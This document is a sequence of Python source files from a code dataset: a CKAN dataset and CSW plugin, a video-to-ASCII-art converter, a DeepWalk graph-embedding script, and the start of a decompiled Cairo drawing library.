def setup_template_variables(self, context, data_dict):\n ''' Setup (add/modify/hide) variables to feed the template engine.\n This is done through through toolkit.c (template thread-local context object).\n '''\n \n super(DatasetForm, self).setup_template_variables(context, data_dict)\n\n c = toolkit.c\n c.publicamundi_magic_number = 99\n \n if c.search_facets:\n # Provide label functions for certain facets\n if not c.facet_labels:\n c.facet_labels = {\n 'res_format': lambda t: t['display_name'].upper()\n }\n\n # Note for all *_template hooks: \n # We choose not to modify the path for each template (so we simply call super()). \n # If a specific template's behaviour needs to be overriden, this can be done by \n # means of template inheritance (e.g. Jinja2 `extends' or CKAN `ckan_extends')\n\n def new_template(self):\n return super(DatasetForm, self).new_template()\n\n def read_template(self):\n return super(DatasetForm, self).read_template()\n\n def edit_template(self):\n return super(DatasetForm, self).edit_template()\n\n def comments_template(self):\n return super(DatasetForm, self).comments_template()\n\n def search_template(self):\n return super(DatasetForm, self).search_template()\n\n def history_template(self):\n return super(DatasetForm, self).history_template()\n\n ## IPackageController interface ##\n \n def after_create(self, context, pkg_dict):\n log1.debug('after_create: Package %s is created', pkg_dict.get('name'))\n pass\n\n def after_update(self, context, pkg_dict):\n log1.debug('after_update: Package %s is updated', pkg_dict.get('name'))\n pass\n\n def after_show(self, context, pkg_dict):\n '''Hook into the validated data dict after the package is ready for display. \n \n The main tasks here are:\n * Fix types for serialized dataset_type-related values (converted to unicode,\n whereas should be str).\n * Convert dataset_type-related parts of pkg_dict to a nested dict or an object.\n\n This hook is for reading purposes only, i.e for template variables, api results, \n form initial values etc. 
It should *not* affect the way the read schema is used: \n schema items declared at read_package_schema() should not be removed (though their \n values can be changed!).\n '''\n\n is_validated = context.get('validate', True)\n for_view = context.get('for_view', False)\n \n log1.debug('after_show: Package %s is shown: view=%s validated=%s api=%s', \n pkg_dict.get('name'), for_view, is_validated, context.get('api_version'))\n \n if not is_validated:\n # Noop: the extras are not yet promoted to 1st-level fields\n return\n\n # Determine dataset_type-related parameters for this package\n \n dt = pkg_dict.get('dataset_type')\n if not dt:\n # Noop: cannot recognize dataset-type (pkg_dict has raw extras?)\n return\n\n dt_spec = self._dataset_types[dt]\n key_prefix = dt_spec.get('key_prefix', dt)\n\n # Fix types, create flat object dict\n \n # Note If we attempt to pop() flat keys here (e.g. to replace them by a \n # nested structure), resource forms will clear all extra fields !!\n\n prefix = key_prefix + '.'\n keys = filter(lambda k: k.startswith(prefix), pkg_dict.iterkeys())\n obj_dict = {}\n for k in keys:\n k1 = k[len(prefix):]\n obj_dict[k1] = pkg_dict[k] = str(pkg_dict[k])\n\n # Objectify \n \n obj_factory = dt_spec.get('class')\n obj = obj_factory().from_dict(obj_dict, is_flat=True, opts={\n 'unserialize-keys': True,\n 'unserialize-values': 'default',\n })\n\n pkg_dict[key_prefix] = obj\n \n # Note We use this bit of hack when package is shown directly from the\n # action api, normally at /api/action/(package|dataset)_show.\n \n r = toolkit.c.environ['pylons.routes_dict']\n if (r['controller'] == 'api' and r.get('action') == 'action' and \n r.get('logic_function') in (\n 'package_show', 'package_create', 'package_update',\n 'dataset_show', 'dataset_create', 'dataset_update')):\n # Remove flat field values (won't be needed anymore)\n for k in keys:\n pkg_dict.pop(k)\n # Dictize obj so that json.dumps can handle it\n pkg_dict[key_prefix] = obj.to_dict(flat=False, opts={\n 'serialize-values': 'json-s' \n })\n \n return pkg_dict\n \n def before_search(self, search_params):\n '''Return a modified (or not) version of the query parameters.\n '''\n #search_params['q'] = 'extras_boo:*';\n #search_params['extras'] = { 'ext_boo': 'far' }\n return search_params\n \n def after_search(self, search_results, search_params):\n '''Receive the search results, as well as the search parameters, and\n return a modified (or not) result with the same structure.\n '''\n #raise Exception('Breakpoint')\n return search_results\n\n def before_index(self, pkg_dict):\n '''Receive what will be given to SOLR for indexing.\n \n This is essentially a flattened dict (except for multi-valued fields \n such as tags) of all the terms sent to the indexer.\n '''\n log1.debug('before_index: Package %s is indexed', pkg_dict.get('name'))\n return pkg_dict\n\n def before_view(self, pkg_dict):\n '''Receive the validated package dict before it is sent to the template. 
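Used here to attach alternative download links for the dataset's metadata. 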
\n '''\n\n log1.debug('before_view: Package %s is prepared for view', pkg_dict.get('name'))\n \n dt = pkg_dict.get('dataset_type')\n dtspec = self._dataset_types.get(dt) if dt else None\n pkg_name, pkg_id = pkg_dict['name'], pkg_dict['id']\n \n # Provide alternative download links for dataset's metadata \n \n if dt:\n download_links = pkg_dict.get('download_links', []) \n if not download_links:\n pkg_dict['download_links'] = download_links\n download_links.extend([\n {\n 'title': dtspec['title'],\n 'url': url_for('/api/action/dataset_show', id=pkg_name),\n 'weight': 0,\n 'format': 'json',\n },\n {\n 'title': dtspec['title'],\n 'url': url_for(\n controller='ckanext.publicamundi.controllers.api:Controller',\n action='dataset_export',\n name_or_id=pkg_name),\n 'weight': 5,\n 'format': 'xml',\n },\n ])\n \n return pkg_dict\n\n ## IResourceController interface ##\n\n def before_show(self, resource_dict):\n '''Receive the validated data dict before the resource is ready for display.\n '''\n \n # Normalize resource format (#66)\n # Note ckan.lib.dictization.model_dictize:resource_dictize converts only\n # some of the formats to uppercase (?), which leads to mixed cases.\n resource_dict['format'] = resource_dict['format'].lower()\n \n return resource_dict\n\n ## IFacets interface ##\n\n def dataset_facets(self, facets_dict, package_type):\n '''Update the facets_dict and return it.\n '''\n if package_type == 'dataset':\n # Todo Maybe reorder facets\n pass\n return facets_dict\n\nclass PackageController(p.SingletonPlugin):\n '''Hook into the package controller\n '''\n\n p.implements(p.IConfigurable, inherit=True)\n p.implements(p.IPackageController, inherit=True)\n \n csw_output_schemata = {\n 'dc': 'http://www.opengis.net/cat/csw/2.0.2',\n 'iso-19115': 'http://www.isotc211.org/2005/gmd',\n 'fgdc': 'http://www.opengis.net/cat/csw/csdgm',\n 'atom': 'http://www.w3.org/2005/Atom',\n 'nasa-dif': 'http://gcmd.gsfc.nasa.gov/Aboutus/xml/dif/',\n }\n \n _pycsw_config_file = None\n _pycsw_service_endpoint = None\n\n ## IConfigurable interface ##\n\n def configure(self, config):\n '''Apply configuration settings to this plugin\n '''\n \n cls = type(self)\n\n site_url = config['ckan.site_url']\n cls._pycsw_config_file = config.get(\n 'ckanext.publicamundi.pycsw.config', \n 'pycsw.ini')\n cls._pycsw_service_endpoint = config.get(\n 'ckanext.publicamundi.pycsw.service_endpoint', \n '%s/csw' % (site_url.rstrip('/')))\n \n ext_pycsw_sync.setup(site_url, self._pycsw_config_file)\n\n return\n\n ## IPackageController interface ##\n\n def after_create(self, context, pkg_dict):\n '''Extensions will receive the validated data dict after the package has been created\n \n Note that the create method will return a package domain object, which may not \n include all fields. 
Also the newly created package id will be added to the dict.\n At this point, the package is possibly in 'draft' state so most Action-API \n (targeting on the package itself) calls will fail.\n '''\n \n log1.debug('A package was created: %s', pkg_dict['id'])\n self._create_or_update_csw_record(context['session'], pkg_dict)\n pass\n\n def after_update(self, context, pkg_dict):\n '''Extensions will receive the validated data dict after the package has been updated\n \n Note that the edit method will return a package domain object, which may not include \n all fields.\n '''\n \n log1.debug('A package was updated: %s', pkg_dict['id'])\n self._create_or_update_csw_record(context['session'], pkg_dict)\n pass\n\n def after_delete(self, context, pkg_dict):\n '''Extensions will receive the data dict (typically containing just the package id)\n after the package has been deleted.\n '''\n\n log1.debug('A package was deleted: %s', pkg_dict['id'])\n self._delete_csw_record(context['session'], pkg_dict)\n pass\n\n def after_show(self, context, pkg_dict):\n '''Receive the validated data dict after the package is ready for display. \n \n Note that the read method will return a package domain object (which may \n not include all fields).\n '''\n \n #log1.info('A package is shown: %s', pkg_dict)\n pass\n\n def before_search(self, search_params):\n '''Extensions will receive a dictionary with the query parameters just before are\n sent to SOLR backend, and should return a modified (or not) version of it.\n \n Parameter search_params will include an \"extras\" dictionary with all values from \n fields starting with \"ext_\", so extensions can receive user input from specific fields.\n This \"extras\" dictionary will not affect SOLR results, but can be later be used by the\n after_search callback.\n '''\n\n #search_params['q'] = 'extras_boo:*';\n #search_params['extras'] = { 'ext_boo': 'far' }\n return search_params\n\n def after_search(self, search_results, search_params):\n '''Extensions will receive the search results, as well as the search parameters,\n and should return a modified (or not) object with the same structure:\n {\"count\": \"\", \"results\": \"\", \"facets\": \"\"}\n \n Note that count and facets may need to be adjusted if the extension changed the results\n for some reason. Parameter search_params will include an extras dictionary with all \n values from fields starting with \"ext_\", so extensions can receive user input from \n specific fields. For example, the ckanext-spatial extension recognizes the \"ext_bbox\"\n parameter (inside \"extras\" dict) and handles it appropriately by filtering the results on one\n more condition (filters out those not contained in the specified bounding box)\n '''\n \n #raise Exception('Breakpoint')\n return search_results\n\n def before_index(self, pkg_dict):\n '''Extensions will receive what will be given to SOLR for indexing. This is essentially\n a flattened dict (except for multli-valued fields such as tags) of all the terms sent\n to the indexer. 
The extension can modify this by returning an altered version.\n '''\n return pkg_dict\n\n def before_view(self, pkg_dict):\n '''Extensions will receive this before the dataset gets displayed.\n \n The dictionary returned will be the one sent to the template.\n '''\n \n dt = pkg_dict.get('dataset_type')\n pkg_name, pkg_id = pkg_dict['name'], pkg_dict['id']\n\n # Provide CSW-backed download links for dataset's metadata \n \n if dt:\n download_links = pkg_dict.get('download_links', []) \n if not download_links:\n pkg_dict['download_links'] = download_links\n download_links.extend([\n {\n 'title': 'DC',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='dc', output_format='application/xml'),\n 'weight': 10,\n 'format': 'xml',\n },\n {\n 'title': 'DC',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='dc', output_format='application/json'),\n 'weight': 15,\n 'format': 'json',\n },\n {\n 'title': 'ISO-19115',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='iso-19115', output_format='application/xml'),\n 'weight': 15,\n 'format': 'xml',\n },\n {\n 'title': 'ISO-19115',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='iso-19115', output_format='application/json'),\n 'weight': 20,\n 'format': 'json',\n },\n {\n 'title': 'FGDC',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='fgdc', output_format='application/xml'),\n 'weight': 25,\n 'format': 'xml',\n },\n {\n 'title': 'Atom',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='atom', output_format='application/xml'),\n 'weight': 30,\n 'format': 'xml',\n },\n {\n 'title': 'NASA-DIF',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='nasa-dif', output_format='application/xml'),\n 'weight': 35,\n 'format': 'xml',\n },\n ])\n \n return pkg_dict\n\n ## Helpers ##\n \n def _build_csw_request_url(self, pkg_id, output_schema='dc', output_format=None):\n '''Build a GetRecordById request to a CSW endpoint\n '''\n \n qs_params = {\n 'service': 'CSW',\n 'version': '2.0.2',\n 'request': 'GetRecordById',\n 'ElementSetName': 'full',\n 'OutputSchema': self.csw_output_schemata.get(output_schema, ''),\n 'Id': pkg_id,\n }\n \n if output_format:\n qs_params['OutputFormat'] = output_format\n \n return self._pycsw_service_endpoint + '?' 
+ urllib.urlencode(qs_params)\n\n def _create_or_update_csw_record(self, session, pkg_dict):\n '''Sync dataset with CSW record'''\n \n pkg_id = pkg_dict['id']\n\n if pkg_dict.get('state', 'active') != 'active':\n log1.info(\n 'Skipped sync of non-active dataset %s to CSW record' % (pkg_id))\n return\n\n record = ext_pycsw_sync.create_or_update_record(session, pkg_dict)\n if record: \n log1.info('Saved CswRecord %s (%s)', record.identifier, record.title)\n else:\n log1.warning('Failed to save CswRecord for dataset %s' %(pkg_id))\n \n return\n\n def _delete_csw_record(self, session, pkg_dict):\n '''Delete CSW record'''\n record = ext_pycsw_sync.delete_record(session, pkg_dict)\n if record:\n log1.info('Deleted CswRecord for dataset %s', pkg_dict['id']) \n return\n\nclass ErrorHandler(p.SingletonPlugin):\n '''Fix CKAN's buggy errorware configuration'''\n p.implements(p.IConfigurer, inherit=True)\n\n @staticmethod\n def _exception_as_mime_message(exc_data, to_addresses, from_address, prefix):\n from weberror.reporter import as_str\n from weberror.formatter import format_text\n\n msg = weberror.reporter.MIMEText(format_text(exc_data)[0])\n msg['Subject'] = as_str(prefix + exc_data.exception_value)\n msg['From'] = as_str(from_address)\n msg['Reply-To'] = as_str(from_address)\n msg['To'] = as_str(\", \".join(to_addresses))\n msg.set_type('text/plain')\n msg.set_param('charset', 'UTF-8')\n return msg\n\n def update_config(self, config):\n from weberror.reporter import EmailReporter as error_reporter\n \n # Override default config options for pylons errorware\n error_config = config['pylons.errorware']\n error_config.update({\n 'error_subject_prefix' : config.get('ckan.site_title') + ': ',\n 'from_address' : config.get('error_email_from'),\n 'smtp_server' : config.get('smtp.server'),\n 'smtp_username': config.get('smtp.user'),\n 'smtp_password': config.get('smtp.password'),\n 'smtp_use_tls' : config.get('smtp.starttls'),\n })\n \n # Monkey-patch email error reporter \n error_reporter.assemble_email = lambda t, exc: self._exception_as_mime_message(\n exc, \n to_addresses=t.to_addresses, \n from_address=t.from_address,\n prefix=t.subject_prefix)\n\nclass SpatialDatasetForm(DatasetForm):\n '''Extend the dataset-form to recognize and read/write the `spatial` extra field.\n This extension only serves as a bridge to ckanext-spatial `spatial_metadata` \n plugin.\n \n Note: \n This should be part of a the ordinary `publicamundi_dataset` plugin (when it\n gets decoupled from schema-handling logic!).\n '''\n \n ## IDatasetForm interface ##\n\n def create_package_schema(self):\n schema = super(SpatialDatasetForm, self).create_package_schema()\n return self.__modify_package_schema(schema)\n\n def update_package_schema(self):\n schema = super(SpatialDatasetForm, self).update_package_schema()\n return self.__modify_package_schema(schema)\n \n def show_package_schema(self):\n schema = super(SpatialDatasetForm, self).show_package_schema()\n \n ignore_missing = toolkit.get_validator('ignore_missing')\n convert_from_extras = toolkit.get_converter('convert_from_extras')\n \n schema['spatial'] = [convert_from_extras, ignore_missing]\n\n return schema\n \n def __modify_package_schema(self, schema):\n \n ignore_empty = toolkit.get_validator('ignore_empty')\n convert_to_extras = toolkit.get_converter('convert_to_extras')\n \n schema['spatial'] = [ignore_empty, convert_to_extras]\n \n return 
schema\n\n","sub_path":"ckanext/publicamundi/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":33205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"181961878","text":"from PIL import Image, ImageDraw, ImageFont\nimport os\nimport cv2\nimport ffmpeg\n\n#Ascii Video Config \nhoriMultiplyer = 30\t\t\t\t\t\t\t\t\t\t\t\t\t\t#pixel width for a single character\nvertMultiplyer = 30\nsourceFPS = 0\nfontSize = 40\nmaxWidth = 100\nisColor = False\nbrightnessAdjustment = -5\nnumberOfCharacters = 0\ngreyscaleChars = {}\nbackgroundColor = (0,0,0)\nfontColor = (255, 255, 255)\n\n\ndef generateFrameConversionData(imgPath):\n #take a colour image\n #take image, shrink and convrt to colour and greyscale\n #return list of tuple with ascii basey on gray value, and colour pix value for EACH pixel\n global maxWidth\n global isColor\n global brightnessAdjustment\n global numberOfCharacters\n global greyscaleChars\n global fontColor\n\n divisor = 255 / numberOfCharacters\n imgData = []\n #Greyscale to ASCII characters\n img = Image.open(imgPath)\n img = img.convert(\"RGB\")\n gImg = img.convert(\"L\")\n size = gImg.size\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#Get the size\n shrinkRatio = size[0] / maxWidth\t\t\t\t\t\t\t\t\t\t\t#Get the ratio to shring by to make it the max Width\n gImg = gImg.resize((int(size[0]/shrinkRatio) ,int(size[1]/shrinkRatio)))\t#Resize the image\n img = img.resize((int(size[0]/shrinkRatio) ,int(size[1]/shrinkRatio)))\t\t#Resize the image\n size = gImg.size\n for y in range (0,size[1]):\t\t\t\t\t\t\t\t\t\t\t\t\t#For ever row. 0,0 is the top left.\n for x in range (0,size[0]):\t\t\t\t\t\t\t\t\t\t\t\t#For every column\n pix = gImg.getpixel((x,y))\n if isColor == True:\n pixColour = img.getpixel((x,y))\n else:\n pixColour = fontColor\t\t\t\t\t\t\t\t\t\t\t#Get the pixel shade (0 - 255)\n pix = brightnessAdjust(pix, brightnessAdjustment)\t\t\t\t#adjust the brightness of the individual pixel\n pix = int(pix / divisor)\t\t\t\t\t\t\t\t\t\t\t#assign pixel shade to an ascii character\n asciiChar = greyscaleChars[str(pix)]\t\t\t\t\t\t\t\t#Create the output string\n imgData.append((asciiChar,pixColour))\n asciiChar = \"\\n\"\n pixColour = (0,0,0)\n imgData.append((asciiChar,pixColour))\n root, ext = os.path.splitext(imgPath)\n print(\"Conversion data generated:\\t\" + imgPath)\n return (generateColourAsciiFrame(imgData, root + '_a' + ext))\n\ndef brightnessAdjust(value, percent):\n\tnewValue = 0\t\t\t\t\t\t\t\t\t\t\t#init new pixel value\n\tpercent = percent / 100\t\t\t\t\t\t\t\t\t#convert percentage to decimal\n\tnewValue = int((value * percent) + value)\t\t\t\t#add or sub percentage from original value\n\n\tif newValue > 255:\t\t\t\t\t\t\t\t\t\t#if new value past the max threshold\n\t\tnewValue = 255\t\t\t\t\t\t\t\t\t\t#cap at 255\n\telif newValue < 0:\t\t\t\t\t\t\t\t\t\t#if below\n\t\tnewValue = 0\t\t\t\t\t\t\t\t\t\t#cap at 0\n\treturn newValue\t\t\t\t\t\t\t\t\t\t\t#return the new value\n\ndef generateColourAsciiFrame(data, newFileName):\n\tglobal horiMultiplyer\n\tglobal vertMultiplyer\n\tglobal fontSize\n\tglobal backgroundColor\n\tx = 0\n\ty = 0\n\tstringData = \"\"\n\tstringList = []\n\tfor s in data:\n\t\ts, _ = s\n\t\tstringData = stringData + s\n\t\tstringList = stringData.split(\"\\n\")\n\thorChars = len(stringList[0])\n\tvertChars = len(stringList)- 1\n\timgHeight = vertChars * vertMultiplyer\n\timgWidth = horChars * horiMultiplyer\n\timg = Image.new(\"RGB\", (imgWidth, imgHeight), color=backgroundColor)\n\tdraw = 
ImageDraw.Draw(img)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#crete a draw object\n\tfont = ImageFont.truetype(\"fonts/cour.ttf\", fontSize)\n\tfor d in data:\n\t\tpix, col = d\n\t\tif pix == \"\\n\":\n\t\t\ty = y + vertMultiplyer\n\t\t\tx = 0\n\t\telse:\n\t\t\tdraw.text((x, y), str(pix), fill=col, font=font, align=\"left\")\n\t\t\tx = x + horiMultiplyer\n\tnewWidth = int(imgWidth * 0.5)\n\tnewHeight = int(imgHeight * 0.5)\n\tprint(newWidth)\n\tprint(newHeight)\n\timg = img.resize((newWidth,newHeight))\n\timg.save(newFileName)\n\tprint(\"\\tAscii Frame Generated:\\t\" + newFileName)\n\treturn(newFileName)\n\ndef videoToFrames(vidFile):\n\tfileList = []\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#init empty list to store file names and track order\n\tmaxWidth = 160\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#specify max width of resized frames\n\tglobal sourceFPS\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#access global variable storing video FPS\n\tvidcap = cv2.VideoCapture(vidFile)\t\t\t\t\t\t\t\t\t\t\t#access the source video file\n\tsourceFPS = vidcap.get(cv2.CAP_PROP_FPS)\t\t\t\t\t\t\t\t\t#determine the FPS of the video file\n\tsuccess,image = vidcap.read()\t\t\t\t\t\t\t\t\t\t\t\t#read the first frame of the video\n\tcount = 0\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#initialize a coutner to track frame numbers\n\twhile success:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#while successfully reading frames\n\t\twidth, height, _ = image.shape\t\t\t\t\t\t\t\t\t\t\t#get the frame dimensions\n\t\tshrinkRatio = width / maxWidth\t\t\t\t\t\t\t\t\t\t\t#Get the ratio to shrink by to make it the max Width\n\t\timage = cv2.resize(image, (int(height/shrinkRatio),int(width/shrinkRatio)))\t#resize the frame\n\t\t#image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\t\t\t\t\t\t\t#convert frame to greyscale\n\t\tcv2.imwrite(\"temp/frames/frame%d.jpg\" % count, image) \t\t\t\t\t\t\t#save frame as JPEG file\n\t\tfileList.append(\"temp/frames/frame%d.jpg\" % count)\t\t\t\t\t\t\t\t\t#append filename to list\n\t\tsuccess,image = vidcap.read()\t\t\t\t\t\t\t\t\t\t\t#read the next frame\n\t\tprint(\"Frame \" + str(count) + \" successfully read\")\t\t\t\t\t\t#print to console\n\t\tcount += 1\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#increment the counter\n\treturn(fileList)\n\ndef imagesToMovie(fileList, videoname):\n global sourceFPS\n frameRate = sourceFPS\n frame = cv2.imread(fileList[0])\n height, width, layers = frame.shape\n video = cv2.VideoWriter(videoname, cv2.VideoWriter_fourcc('M','J','P','G'),frameRate,(width, height))\n for f in fileList:\n frame = cv2.imread(f)\n video.write(frame)\n print(f + \" Written to video\")\n video.release()\n\ndef transferAudioBetweenVideos(vidSrc, vidDst):\n\tsrcInput = ffmpeg.input(vidSrc)\n\tdstInput = ffmpeg.input(vidDst)\n\tffmpeg.output(srcInput.audio, dstInput.video, \"audio_\" + vidDst).run()\n\n\tos.remove(vidDst)\n\tos.rename((\"audio_\" + vidDst), vidDst)\n\nvidContent = [] #list of file names ASCII content\nnewFrames = [] #may not be required anymore\n\nwith open(\"characters.txt\") as fh:\n for line in fh:\n command, description = line.strip().split(',', 1)\n description = description.strip()\n if not description:\n description = \" \"\n \n greyscaleChars[command] = description\n\n#greyscaleChars = lines\nnumberOfCharacters = len(greyscaleChars)\n\nsrcVideo = input(\"Enter name of source video:\\t\")\ndstVideo = input(\"Enter name for new ascii video:\\t\")\n\n#Convert video to frames\nsrcFrames = videoToFrames(srcVideo)\n\n#For each frame, generate the conversion data\nfor frame in srcFrames:\n 
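The heart of `generateFrameConversionData` above is the bucketing of a 0-255 grayscale value into one of N ramp characters via `divisor = 255 / numberOfCharacters` and `pix = int(pix / divisor)`. A self-contained sketch of that mapping, with a hard-coded ramp standing in for the `characters.txt` table the script loads, plus an explicit clamp for the `gray == 255` edge case that the dict lookup above leaves to the character file:

# Minimal sketch of the grayscale-to-ASCII bucketing; the ramp here is an
# assumption, the script builds its own mapping from characters.txt.
RAMP = ' .:-=+*#%@'

def pixel_to_char(gray, ramp=RAMP):
    # Map a grayscale value in [0, 255] to one ramp character.
    divisor = 255 / len(ramp)
    index = min(int(gray / divisor), len(ramp) - 1)  # clamp the 255 case
    return ramp[index]

assert pixel_to_char(0) == ' '
assert pixel_to_char(255) == '@'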
vidContent.append(generateFrameConversionData(frame))\n\nprint(\"************************************\")\nprint(\"************************************\")\nimagesToMovie(vidContent, dstVideo)\ntransferAudioBetweenVideos(srcVideo,dstVideo)\n\nfor f in srcFrames:\n os.remove(f)\nfor f in vidContent:\n os.remove(f)\n","sub_path":"vid2ascii.py","file_name":"vid2ascii.py","file_ext":"py","file_size_in_byte":6741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"209017073","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport random\n# from io import open\n# from argparse import ArgumentParser, FileType, ArgumentDefaultsHelpFormatter\nfrom collections import Counter\nfrom deepwalk import graph\nfrom deepwalk import walks as serialized_walks\nfrom gensim.models import Word2Vec\nfrom deepwalk.skipgram import Skipgram\nimport numpy as np\n\n\ndef run_dw(matrix,\n num_walks=100,\n walk_length=5,\n representation_size=32,\n window_size=2,\n undirected=True,\n seed=0,\n workers=1):\n random.seed(seed)\n np.random.seed(seed)\n adj_list = []\n for n, edges in enumerate(matrix):\n adj_list.append([n] + edges.nonzero()[0].tolist())\n\n print(adj_list)\n\n G = graph.from_adjlist(adj_list)\n if undirected:\n G.make_undirected()\n\n print(\"Number of nodes: {}\".format(len(G.nodes())))\n num_walks = len(G.nodes()) * num_walks\n\n print(\"Number of walks: {}\".format(num_walks))\n\n data_size = num_walks * walk_length\n\n print(\"Data size (walks*length): {}\".format(data_size))\n\n if data_size < 1000000000:\n print(\"Walking...\")\n walks = graph.build_deepwalk_corpus(G,\n num_paths=num_walks,\n path_length=walk_length,\n alpha=0,\n rand=random.Random(seed))\n print(\"Training...\")\n model = Word2Vec(walks,\n size=representation_size,\n window=window_size,\n min_count=0,\n sg=1,\n hs=1,\n workers=workers)\n else:\n print(\n \"Data size {} is larger than limit (max-memory-data-size: {}). 
Dumping walks to disk.\".\n format(data_size, 1000000000))\n print(\"Walking...\")\n\n walks_filebase = str(adj_list) + \".walks\"\n walk_files = serialized_walks.write_walks_to_disk(G,\n walks_filebase,\n num_paths=num_walks,\n path_length=walk_length,\n alpha=0,\n rand=random.Random(seed),\n num_workers=workers)\n\n print(\"Counting vertex frequency...\")\n #if not args.vertex_freq_degree:\n vertex_counts = serialized_walks.count_textfiles(walk_files, workers)\n #else:\n # # use degree distribution for frequency in tree\n # vertex_counts = G.degree(nodes=G.iterkeys())\n\n print(\"Training...\")\n walks_corpus = serialized_walks.WalksCorpus(walk_files)\n model = Skipgram(sentences=walks_corpus,\n vocabulary_counts=vertex_counts,\n size=representation_size,\n window=window_size,\n min_count=0,\n trim_rule=None,\n workers=workers,\n seed=seed)\n\n embeddings = np.zeros((len(G.nodes()), representation_size))\n\n for i in range(len(G.nodes())):\n embeddings[i] = model.wv.get_vector(str(i))\n\n return embeddings\n\n\ndef main():\n input_test = np.ones((2, 2))\n # input_test[0][1] = 1\n # input_test[1][0] = 1\n\n print(run_dw(input_test))\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"envs/run_deep_walk.py","file_name":"run_deep_walk.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"181256325","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\kafx\\libs\\draw\\extra.py\n# Compiled at: 2012-03-25 17:53:08\n\"\"\"\n.. module:: libs.draw.extra\n :platform: Unix, Windows\n :synopsis:\n This module contains useful functions on which other drawing functions depend.\n.. 
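The adjacency handling at the top of `run_dw` above converts a dense matrix into deepwalk's adjacency-list format, one `[node, neighbor, ...]` row per node. Restated as a standalone function (the same `nonzero` trick, no other assumptions):

import numpy as np

def adjacency_matrix_to_list(matrix):
    # Convert a dense adjacency matrix into the list-of-lists format
    # expected by deepwalk's graph.from_adjlist: [node, neighbor, neighbor, ...].
    adj_list = []
    for n, edges in enumerate(np.asarray(matrix)):
        adj_list.append([n] + np.flatnonzero(edges).tolist())
    return adj_list

# The 2x2 all-ones matrix from main() above yields [[0, 0, 1], [1, 0, 1]].
print(adjacency_matrix_to_list(np.ones((2, 2))))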
moduleauthor:: Kafx team http://kafx.com.ar\n\"\"\"\nfrom math import ceil\nfrom random import random\nimport itertools, cairo\nfrom libs import video, common\nimport basic, advanced\ndebugi = -1\n\ndef DebugCairo(folder='caps/'):\n global debugi\n debugi += 1\n video.cf.ctx.get_group_target().write_to_png(folder + str(debugi).zfill(5) + '.png')\n\n\ndef LoadSequence(folder, count, digits=3, extend=cairo.EXTEND_NONE):\n \"\"\"Loads a set of textures\n @folder : folder containing the images\n if there's a common prefix you can include it,\n use '/'\n\n @count : image count [0 -> count-1]\n\n @digits: number of digits used\n\n @extend: texture's extend (default EXTEND_NONE)\n if used with cSprite extend must be set to cairo.EXTEND_NONE\n \"\"\"\n return [ LoadTexture(folder + str(i).zfill(digits) + '.png', extend) for i in range(count)\n ]\n\n\ndef LoadTexture(filename, extend=cairo.EXTEND_REPEAT):\n \"\"\"Returns a cairo texture (`cairo.SurfacePattern`) using a png filename\n Used in set_source or whatever\n @filename: png filename\n\n @extend: texture's extend (default `cairo.EXTEND_REPEAT`)\n if used with cSprite extend MUST be set to `cairo.EXTEND_NONE`\n \"\"\"\n t = cairo.SurfacePattern(cairo.ImageSurface.create_from_png(filename))\n t.set_extend(extend)\n return t\n\n\ndef MoveTexture(pattern, x, y, org_x=0.0, org_y=0.0, angle=0.0, scale_x=1.0, scale_y=1.0):\n \"\"\"Moves, rotates and scales a texture loaded with LoadTexture, or any other cairo pattern\"\"\"\n pattern.set_matrix(CreateMatrix(x, y, org_x, org_y, angle, scale_x, scale_y, True))\n\n\ndef SetStyle(style):\n \"\"\"Prepares cairo with the styles\n Before drawing any text you can call this function to set up the basic stuff\n the style type has to be :class:`libs.asslib.cProperties`\n \"\"\"\n ctx = video.cf.ctx\n ctx.select_font_face(style._font, int(style._italic), int(style._bold))\n ctx.set_font_size(style._size)\n\n\ndef CreateMatrix(pos_x=0, pos_y=0, org_x=0, org_y=0, angle=0, scale_x=1, scale_y=1, inverse=False):\n \"\"\"Creates a matrix with standard transforms\n pos_x, pos_y: x/y final position\n org_x, org_y: origin for the transform\n angle: (radians)\n scale_x scale_y: obvious, ain't it?\n inverse = False inverse matrices or not\n scales must be inverted if matrix is inverse: scale=1.0/scale\"\"\"\n m = cairo.Matrix()\n if not scale_x:\n scale_x = 1e-05\n if not scale_y:\n scale_y = 1e-05\n if inverse:\n m.translate(org_x, org_y)\n m.rotate(angle)\n m.scale(scale_x, scale_y)\n m.translate(-pos_x, -pos_y)\n else:\n m.translate(pos_x, pos_y)\n m.scale(scale_x, scale_y)\n m.rotate(-angle)\n m.translate(-org_x, -org_y)\n return m\n\n\nclass cCairoColor():\n \"\"\"Class for solid colors\"\"\"\n\n def __init__(self, number=None, text='', ccolor=None, components=None):\n \"\"\"\n 4 independent ways to initialize\n If no argument is given the resultant is White\n @number through FromNumber, receives an integer (0xAARRGGBB)\n @texto through FromText, receives a string 